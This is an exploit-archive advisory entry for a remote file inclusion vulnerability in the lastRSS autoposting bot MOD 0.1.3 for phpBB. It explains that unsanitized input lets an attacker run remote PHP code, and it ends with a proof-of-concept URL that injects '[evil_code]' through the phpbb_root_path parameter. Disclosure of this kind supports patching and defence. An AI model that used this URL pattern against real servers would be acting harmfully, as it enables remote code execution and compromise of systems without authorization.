[] NeoSense

lastRSS autoposting bot MOD 0.1.3 - 'phpbb_root_path' Remote File Inclusion

Author: Kacper
type: webapps
platform: php
port: 
date_added: 2009-02-20 
date_updated: 2014-04-11 
verified: 1 
codes: OSVDB-106961 
tags: 
aliases:  
screenshot_url:  
application_url: 

source: https://www.securityfocus.com/bid/33843/info

lastRSS autoposting bot MOD is prone to a remote file-include vulnerability because the application fails to properly sanitize user-supplied input.

An attacker can exploit this issue to include arbitrary remote files containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying computer; other attacks are also possible.

This issue affects lastRSS autoposting bot MOD 0.1.3; other versions may also be vulnerable.

http://www.example.com/includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=[evil_code]